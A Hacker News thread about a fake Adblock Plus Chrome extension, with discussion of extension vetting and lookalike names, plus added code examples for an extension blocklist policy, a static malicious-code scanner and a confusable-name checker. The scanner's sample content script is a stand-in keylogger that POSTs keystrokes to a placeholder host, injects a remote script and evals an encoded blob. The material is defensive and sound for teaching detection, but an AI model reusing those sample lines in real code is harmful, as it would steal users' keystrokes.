37k Chrome users downloaded a fake Adblock Plus extension (engadget.com)
152 points by sus_007 on Oct 10, 2017 | hide | past | favorite | 39 comments



Extensions are the new "Let's play find the download button on a webpage" that's been around for years. [1]

So many users download replicas of uBlock and find it hard to install the original uBlock Origin extension. Countless times have I had to send them a direct link to Chrome's extension site just to make sure they're installing the right one. This is the case especially as the genuine extension in this case has no direct author website and instead lists a repo on GitHub (average users feel this indicates a knockoff and look elsewhere).

[1] https://www.pcworld.com/article/2012958/how-to-avoid-fake-do...


This is especially a problem when you try looking for new extensions. It's not sufficient to just look at the reviews or popularity, since oftentimes the users themselves have no idea their browsing history is being captured and sold. Also, it seems that Google is in no hurry to fix this issue, as even after malicious extensions have been discovered and reported they remain up (see: https://news.ycombinator.com/item?id=14889619).

From the client side one mitigation might be to have all extensions denied network access by default and have the user manually whitelist those in a Little Snitch-like manner. There is an experimental flag for something similar to this called "User consent for extension scripts." From Google's side the best thing would be to run all extensions in a sandbox like they supposedly do for Android apps and monitor their activity to see if they do anything suspicious like record browsing history, redirect pages, or call out to sketchy URLs.


> From the client side one mitigation might be to have all extensions denied network access by default and have the user manually whitelist those in a Little Snitch-like manner.

I don't think Google has any interest in doing that. You can't block internet access on a per-app basis on Android either, even though this would close tons of information leaks that the clunky permission system they currently have in place just can't fix.

And as for the best thing to do from Google's side, that would probably be what Mozilla is doing. Sit actual human beings down to look at the code of newly submitted extensions and of extension updates.

No, this does not scale and can't be automated by some algorithm, but it actually works. And it's not like it needs to scale into the millions.


A good middle ground might be to review only the top 1000 extensions or so and put a trusted checkmark on them.

Reflecting back on the automated extension review, I just realized that the problem is more complex than it seems at first glance, since extensions can also contain content scripts that inject JS directly into pages themselves, so it's easy to mask the source of a POST by injecting the XHR directly into the webpage.


I had the exact same problem re: uBlock Origin. I even set up a quick site[1] a couple referrals ago just so I could have a place to easily point someone to.

[1] https://getublock.com/


You could do a little bit of work to automatically select the right browser based on user-agent, and just display one button prominently.


Yeah, it does need a bit of love; I whipped it up in about 15 minutes or so when I wanted to link someone to the extension.


>This is the case especially as the genuine extension in this case has no direct author website and instead lists a repo on Github

It's the other way round for me. I only install an extension if I find the GitHub (or similar) repo with sufficient activity, stars or whatever. I would even sometimes use Google search with the site:github.com string when looking for extensions or Android apps. It would be nice if the Chrome store and even the Android Play store had a FOSS tick box.


Ordinarily, people might find seeing the repository straight-up too jarring. For people who aren't in the IT world, I'm not sure that seeing Github will be some definitive proof that an extension is legit.


Furthermore, it is only definitive until it isn't. If we trained users to look for the github page, we'd have forked projects that point to the compromised extension, fake github clones that look like the project, fraudulent likes, and so forth.


Or clones that point to the legitimate github repo.


Even in the IT world, having spent literally my entire career writing code, I found github completely inscrutable when it first arrived, because all the explanatory text gets pushed down to the bottom of the page where you can't see it, which is completely opposite from... well... pretty much any other system of organizing information I have ever seen, ever.

I felt really pissed off, actually, that so many people were cluttering up Hacker News with all these low-effort links to random unexplained directories inside unfamiliar source repos, somehow thinking it reasonable to presume that we would all want to just dig around in their source code trying to understand what it was they were attempting to do. "github.com" became a negative value signal just as strong as "experts-exchange.com", and I tried to avoid ever clicking on such worthless links.

It was probably a couple of years before I ever had reason to actually use github and discover that the information I had wanted had been present all along. Now of course the inverted layout has become second nature... but I still think it's a bad idea to send anyone who is not already a github user to a github link and expect them to find anything useful to do with it.


Even for people who are, that isn't really "definitive proof" of anything.


If a project looks popular, you can at least assume it isn't total rubbish though.


I'm not saying I wouldn't do the same, but it's more of a heuristic than "definitive proof."



I always get my add-ons straight from GitHub. That way I'm running the latest version and bypassing Mozilla.

But you have to be an advanced user; it is complex now to install an "unsupported" add-on.


As an aside, anyone know why both of the major adblockers have an unrelated adblocker with the same name? (AdBlock/AdBlock Plus, uBlock/uBlock Origin.) Who thought this was a good idea?


Adblock and Adblock Plus were different developers. (Now, I believe, they are both controlled by Eyeo.) The obvious name is shared; the "Plus" was added to indicate a fork of an earlier project. I believe this was far prior to the project getting monetized.

uBlock Origin was originally just uBlock, but a rough moderator took it over (or that's somewhat the story), so there's the Origin fork with the original dev; the uBlock project does not appear to progress anymore.


> Extensions are the new "Let's play find the download button on a webpage" that's been around for years.

Chrome extensions are that. No other browser has this problem.

I think it's necessary to be pointing fingers here, to get Google to maybe finally do something about it and so that people don't mistakenly limit their use of extensions on other browsers.


This is, unfortunately, remarkably common. It only received a lot of attention here because it pretended to be a well-known extension: The Web Store is full of extensions which hijack your start page and search provider and have full access to all of your web content. They're often installed via pages through malicious ads which state that you must accept Chrome's install extension request to continue web browsing and use a variety of JavaScript-based tricks to keep you on the page until you do. (The other thing that occasionally gets mentioned: Extensions get bought out so that adware and spyware is automatically pushed down to Chrome users silently.)

Many times, I've reported malicious extensions I've found on users' PCs, and months later they are still alive and well on the Web Store. Google has not taken significant steps to vet browser extensions despite the massive amount of access to your personal data they have, particularly if they use permissions like accessing the content of pages you're on.

Microsoft appears to only permit Edge extensions on a case-by-case, human-vetted basis. I strongly recommend instructing lay users to use Edge over Chrome, and those who insist on Chrome should have --no-extensions added to their shortcuts to ensure Google's extension interface is wholly disabled. (At the office, I use a group policy to block all extensions on all Chrome installs network-wide. Google provides surprisingly decent tools to do this.)

Unfortunately, while Chrome regularly brags about their security measures, it does very little when they permit (and distribute) malicious extensions in their store with permissions to do whatever they want with user data. Their Pwn2Own records, their bug bounties, it's all irrelevant while they don't consider this a serious issue. It is akin to bragging about how good your deadbolt is while leaving the door wide open.
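The "block every extension, allow a vetted few" group policy the comment above describes, as an added example that is not code from the thread or from Google. It builds the policy object Chrome reads and resolves it the way Chrome does (an explicit allowlist entry wins over the blocklist; a "*" blocklist denies everything else), and puts the weak variant (blocklisting only known-bad IDs) beside it. The policy key names are the current ones; at the time of the thread they were spelled ExtensionInstallBlacklist / ExtensionInstallWhitelist with the same meaning. The extension IDs are placeholders, not real listings, and the file path is the Linux policy directory; Windows keeps the same keys under HKLM\Software\Policies\Google\Chrome.

```javascript
'use strict';
// Added example (not from the thread): Chrome extension install policy,
// deny-by-default with an allowlist, plus a checker that resolves it the
// way Chrome does. Extension IDs below are placeholders.

// Chrome Web Store extension IDs are 32 characters drawn from a-p.
const EXTENSION_ID = /^[a-p]{32}$/;

// Corrected setting: block everything, allow only vetted IDs.
function buildExtensionPolicy(allowedIds) {
  for (const id of allowedIds) {
    if (!EXTENSION_ID.test(id)) throw new Error(`not a Web Store extension ID: ${id}`);
  }
  return {
    ExtensionInstallBlocklist: ['*'],           // deny by default
    ExtensionInstallAllowlist: [...allowedIds], // takes precedence over the blocklist
  };
}

// Resolve a policy for one extension ID: explicit allow wins, then an
// explicit or wildcard block denies, otherwise the install is permitted.
function policyAllows(policy, id) {
  const allow = policy.ExtensionInstallAllowlist || [];
  const block = policy.ExtensionInstallBlocklist || [];
  if (allow.includes(id)) return true;
  return !(block.includes('*') || block.includes(id));
}

// Weak setting people often start with: blocklist the IDs they already know
// are bad. Every extension not yet on the list still installs.
const WEAK_POLICY = { ExtensionInstallBlocklist: ['ponmlkjihgfedcbaponmlkjihgfedcba'] }; // placeholder ID
const STRICT_POLICY = buildExtensionPolicy(['abcdefghijklmnopabcdefghijklmnop']);       // placeholder ID

// On Linux this JSON goes in a file under /etc/opt/chrome/policies/managed/.
function policyJson(policy) {
  return JSON.stringify(policy, null, 2);
}

console.log(policyJson(STRICT_POLICY));
```

Verify the result on a managed machine at chrome://policy, which shows which keys were actually picked up and from where.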


I audit every extension before I install it. You should too. https://chrome.google.com/webstore/detail/chrome-extension-s...


I am a mechanical engineer not a software developer. Any advice for me?


Personal auditing doesn't really solve the problem because extensions update automatically, and there are numerous cases of the authors of popular extensions being approached to sell out their userbase in exchange for cash, providing a motive for formerly-audited extensions to go bad. Here are some basic tips for defending yourself:

1. Minimize the number of extensions you use to the bare essentials. If you can live without it, uninstall it. If you rarely use it, uninstall it.

2. Prefer extensions from well-known organizations rather than unknown individuals. Example: there are plenty of extensions that force HTTP requests to HTTPS when possible, but I exclusively use the one from the EFF. Organizations have less to gain and more to lose from breaching the trust of their users in this way.

3. Prefer extensions that multiple software developers have recommended personally. This won't itself protect you from malware, but it does increase the likelihood that emergent malware will be discovered promptly and loudly publicized.

4. If you absolutely need an extension and none of the above apply, download the source code of the extension yourself and manually load it into your browser, to keep it from being automatically updated. (Part of me is wary to recommend this, as software that never gets updated is historically prone to being exploited by lingering unpatched flaws, but I'm having a hard time coming up with an attack vector of this sort for browser extensions.)


Chrome does a good job of notifying you when an extension needs new permissions, like if it's been hacked to keylog you on every page or something.

Of course, most users have fatigue for these sorts of dialogues and just hit accept (I have done the same in a lot of cases).

I also like Extension Update Notifier

https://chrome.google.com/webstore/detail/nlldbplhbaopldicmc...

Which pops up a toast notification whenever your extensions get updated. At least then it's not a silent upgrade and you can investigate if you wish.


Here are a few things I'm scanning for:

1. Unexpected URLs or IP addresses. Most attack vectors, for example a key-logger, need to call home at some point. Keep in mind, the address may be stored in pieces that are later concatenated together, or other tricks like using charAt() that will break a naive search for "http://".

2. Blobs of base64 code or other obfuscated text that are later eval'd...

3. Or really anything in an eval function is super suspicious.

4. Remote scripts that are injected into pages. Does this plugin have a solid reason to do that? Otherwise, it's an obvious backdoor even if not necessarily nefarious.

5. Look for code that targets specific domains that are out of scope. If you're looking at an extension for a color picker, you wouldn't expect to see code targeting specific high-value sites like Paypal or Gmail.

6. If it's an email productivity add-on, is it stealing emails and contact information from signatures? It's surprisingly common.

7. Some extensions will try to swap out the advertiser IDs or change affiliate links. Unless it's an adblocker, you shouldn't expect to see any code targeting ads.
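A static triage pass that implements the seven checks above, as an added example; it is not code from the thread or from any extension named in it. It also covers the earlier point that a content script can inject a script tag into the page so the POST appears to come from the page itself, and the concatenation trick from item 1, by folding "ht" + "tp://" back into "http://" before matching. Every regex is a heuristic chosen for this example, the sample manifest and content script are constructed here (no real listing), and the output is a list of lines to read first, not a verdict. Runs under Node.js 14 or later.

```javascript
'use strict';
// Added example, not from the thread: static triage of an unpacked Chrome
// extension. The manifest and cs.js below are constructed for this example.

const SAMPLE_MANIFEST = {
  name: 'Colour Picker', manifest_version: 2,
  permissions: ['activeTab', 'storage', '*://api.colours.example/*'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['cs.js'] }],
};
const SAMPLE_FILES = {
  'cs.js': [
    'const h = "ht" + "tp://" + "stats.example" + ".test/c";',
    'document.addEventListener("keyup", e => { const x = new XMLHttpRequest(); x.open("POST", h); x.send(e.key); });',
    'if (location.hostname.endsWith("paypal.example")) { /* special case */ }',
    'const s = document.createElement("script"); s.src = "https://cdn.example.test/p.js"; document.head.appendChild(s);',
    'eval(atob("Y29uc29sZS5sb2coImhpIik7Y29uc29sZS5sb2coImhpIik7Y29uc29sZS5sb2coImhpIik7Y29uc29sZS5sb2coImhpIik7"));',
    'fetch("https://api.colours.example/palette").then(r => r.json());',
  ].join('\n'),
};

// Check 1 helper: fold adjacent string literals joined by '+' on one line so
// "ht" + "tp://" reads as "http://". A text rewrite, not a parser; it repeats
// until nothing changes and may be confused by escaped quotes.
function foldConcatenatedStrings(src) {
  const pair = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1[ \t]*\+[ \t]*(["'])((?:\\.|(?!\3)[^\\\n])*)\3/g;
  let prev;
  do { prev = src; src = src.replace(pair, (_m, _q1, a, _q2, b) => `"${a}${b}"`); }
  while (src !== prev);
  return src;
}

// Host globs the manifest declares ("*.example.com"); "<all_urls>" -> "*".
function declaredHostGlobs(manifest) {
  const patterns = [
    ...(manifest.permissions || []), ...(manifest.optional_permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap(cs => cs.matches || []),
  ];
  const globs = new Set();
  for (const p of patterns) {
    if (p === '<all_urls>') { globs.add('*'); continue; }
    const m = /^\*?[a-z]*:?\/\/([^/]+)/.exec(p);
    if (m) globs.add(m[1].toLowerCase());
  }
  return [...globs];
}
function hostMatchesGlob(host, glob) {
  if (glob === '*') return true;
  if (glob.startsWith('*.')) { const b = glob.slice(2); return host === b || host.endsWith('.' + b); }
  return host === glob;
}

const ENDPOINT_RE = /\b(?:https?|wss?|ftp):\/\/([a-z0-9.-]+|\[[0-9a-f:.]+\])(?::\d+)?|\b(?:\d{1,3}\.){3}\d{1,3}\b/gi;
// Checks 2-7, one heuristic regex each (no 'g' flag, so .test() is stateless).
const RULES = [
  { id: 'eval', why: 'dynamic code execution',
    re: /\beval\s*\(|new\s+Function\s*\(|set(?:Timeout|Interval)\s*\(\s*["'`]/ },
  { id: 'base64-blob', why: 'long opaque literal; decode and read it',
    re: /["'`][A-Za-z0-9+/]{60,}={0,2}["'`]/ },
  { id: 'string-assembly', why: 'string built at runtime; resolve it by hand',
    re: /String\.fromCharCode|\.charAt\s*\(|\batob\s*\(|\.split\s*\(\s*["'`]{2}\s*\)\s*\.reverse/ },
  { id: 'remote-script', why: 'script injected into the page; its requests look like the page sent them',
    re: /createElement\s*\(\s*["'`]script["'`]\s*\)|chrome\.tabs\.executeScript|\.src\s*=\s*["'`]https?:/ },
  { id: 'site-targeting', why: 'behaviour keyed to a specific site; is it in scope?',
    re: /(?:hostname|host|href|location)[^;\n]*["'`][a-z0-9.-]+\.[a-z]{2,}["'`]/ },
  { id: 'keystroke-capture', why: 'listens to keystrokes',
    re: /addEventListener\s*\(\s*["'`]key(?:down|up|press)["'`]/ },
  { id: 'affiliate-rewrite', why: 'touches affiliate or ad parameters',
    re: /\b(?:tag|aff_id|affiliate|subid|clickid)=/i },
];

// Returns [{file, line, rule, detail, note?}] for a human to read through.
function scanExtension(manifest, files) {
  const globs = declaredHostGlobs(manifest).filter(g => g !== '*'); // "<all_urls>" justifies nothing
  const findings = [];
  for (const [file, raw] of Object.entries(files)) {
    foldConcatenatedStrings(raw).split('\n').forEach((text, i) => {
      const line = i + 1;
      for (const m of text.matchAll(ENDPOINT_RE)) {
        const host = (m[1] || m[0]).toLowerCase();
        const note = globs.some(g => hostMatchesGlob(host, g))
          ? 'matches a declared host pattern' : 'no specific host pattern declares this host';
        findings.push({ file, line, rule: 'endpoint', detail: host, note });
      }
      for (const r of RULES) if (r.re.test(text)) findings.push({ file, line, rule: r.id, detail: r.why });
    });
  }
  return findings;
}

function main() {
  for (const f of scanExtension(SAMPLE_MANIFEST, SAMPLE_FILES)) {
    console.log(`${f.file}:${f.line} [${f.rule}] ${f.detail}${f.note ? ' (' + f.note + ')' : ''}`);
  }
}
main();
```

To run it against a real extension, replace SAMPLE_FILES with the contents of the unpacked directory (on Linux the Web Store copies live under ~/.config/google-chrome/Default/Extensions/<id>/<version>/) and read manifest.json from the same place. Expect false positives: the point of each hit is to tell you which line to read, and a hidden endpoint only shows up if the folding step happens to undo the author's particular way of splitting it.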


Run Firefox. Mozilla audits extensions and extension updates before they get published.


Catch-22?


What are Google's rules about names? Only difference I can see here is the fake one is called "AdBlock" and the real one "Adblock".

Is changing the case of one letter enough to get an extension into the Chrome store? Or even worse are overlapping names allowed?


It's hard enough to tell someone which is best; telling them the particular capitalization is impossible without giving them a direct link.

In addition, preventing duplicate names is fairly hard if you support Unicode. Characters like the zero width space, Mongolian vowel separator and many others make a name algorithmically different while visually it is the same.


That's not really an issue. You can always compare normalized versions of the name.


The fake one is in the "Apps" section and the real one is in the "Extensions" section. Since apps aren't as popular overall as extensions, it's easier to game that section to get to the top.


Google should make the extension name case insensitive like domain names. That should help a little bit.


Then people will use Cyrillic letters, etc. That approach simply does not work.


Yeah, it's a problem for domain names too: https://www.xudongz.com/blog/2017/idn-phishing/
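The normalized comparison proposed a few replies up, extended to the zero-width-character and Cyrillic look-alike cases the other replies raise, as an added example that is not code from the thread or from the Web Store. It builds a collision key for a listing name (compatibility normalization, removal of format characters, case folding, a look-alike map) and a mixed-script check, which together cover the case-only "AdBlock" vs "Adblock" difference, the zero width space, and Cyrillic letters substituted for Latin ones. The look-alike table is a small hand-picked subset chosen for this example, not the full Unicode confusables data, and the names it is run against are made up.

```javascript
'use strict';
// Added example: a collision key for extension names. "AdBlock", "Adblock",
// "Ad<ZWSP>Block", fullwidth "ＡｄＢｌｏｃｋ" and a Cyrillic-lettered "Аdblock"
// all reduce to "adblock". The confusable table is a hand-picked subset
// (an assumption for this example), not the full Unicode TR39 data.

// Look-alike letters mapped to the ASCII letter they imitate.
const CONFUSABLES = new Map([
  ['\u0430', 'a'], ['\u0435', 'e'], ['\u043e', 'o'], ['\u0440', 'p'], // Cyrillic а е о р
  ['\u0441', 'c'], ['\u0443', 'y'], ['\u0445', 'x'], ['\u0455', 's'], // Cyrillic с у х ѕ
  ['\u0456', 'i'], ['\u0458', 'j'], ['\u04bb', 'h'],                  // Cyrillic і ј һ
  ['\u03b1', 'a'], ['\u03bf', 'o'], ['\u03c1', 'p'], ['\u03bd', 'v'], // Greek α ο ρ ν
  ['\u0131', 'i'], ['\u026a', 'i'],                                   // dotless i, small capital I
]);
// Format characters (Unicode category Cf: zero width space, joiners, BOM,
// soft hyphen, ...) plus the Mongolian vowel separator, which older Unicode
// versions classed as a space rather than a format character.
const INVISIBLE = /[\p{Cf}\u180E]/gu;

function skeleton(name) {
  let s = name.normalize('NFKC');          // fullwidth letters, ligatures -> compatibility forms
  s = s.replace(INVISIBLE, '');            // drop zero-width and other format characters
  s = s.toLowerCase().normalize('NFKC');   // case-fold (lowercasing can decompose, e.g. İ)
  s = Array.from(s, ch => CONFUSABLES.get(ch) || ch).join('');
  s = s.replace(/\s+/g, ' ');              // any whitespace, including NBSP -> one space
  return s.replace(/[^\p{L}\p{N} ]/gu, '').trim(); // keep letters, digits and spaces
}

const SCRIPTS = { Latin: /\p{Script=Latin}/u, Cyrillic: /\p{Script=Cyrillic}/u, Greek: /\p{Script=Greek}/u };
function scriptsUsed(name) { return Object.keys(SCRIPTS).filter(k => SCRIPTS[k].test(name)); }
function hasInvisible(name) { return name.replace(INVISIBLE, '') !== name; }
function namesCollide(a, b) { return skeleton(a) === skeleton(b); }

// Reasons a store could refuse a candidate listing name; empty means OK.
function checkNewName(candidate, existingNames) {
  const reasons = [];
  if (scriptsUsed(candidate).length > 1) reasons.push('mixed scripts');
  if (hasInvisible(candidate)) reasons.push('invisible characters');
  for (const name of existingNames) if (namesCollide(candidate, name)) reasons.push(`collides with "${name}"`);
  return reasons;
}

// Constructed names for demonstration.
const EXISTING = ['Adblock', 'Adblock Plus', 'uBlock Origin'];
for (const c of ['AdBlock', 'Ad\u200BBlock', '\u0410dblock', 'ＡｄＢｌｏｃｋ', 'uBlock Plus']) {
  console.log(JSON.stringify(c), '->', JSON.stringify(skeleton(c)), checkNewName(c, EXISTING));
}
```

The key is deliberately lossy: it exists to ask "would a user confuse these?", not to decide what the name really is, so the store would show the collision to a reviewer rather than reject on it automatically. A production version would use the full Unicode confusables table and a per-script policy instead of the short map here.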


Reminiscent of the problem earlier this year where GOOGLE DOCS ITSELF was spoofed with a Google-approved (for a brief window, at least) web app called "Google Docs":

https://www.theverge.com/2017/5/3/15534768/google-docs-phish...

It's pretty insane that Google keeps tripping over itself on this same issue. Surely they have the means and know-how to prevent it.


It's even worse. 3,878,417 computers have a fake uBlock Origin clone called uBlock Plus (playing on the fact that there's Adblock and Adblock Plus) installed.

https://chrome.google.com/webstore/detail/ublock-plus/kjagjn...


Google in general is poor on security; this should have been anticipated.


Where's the bashing about Apple's App Store policy?



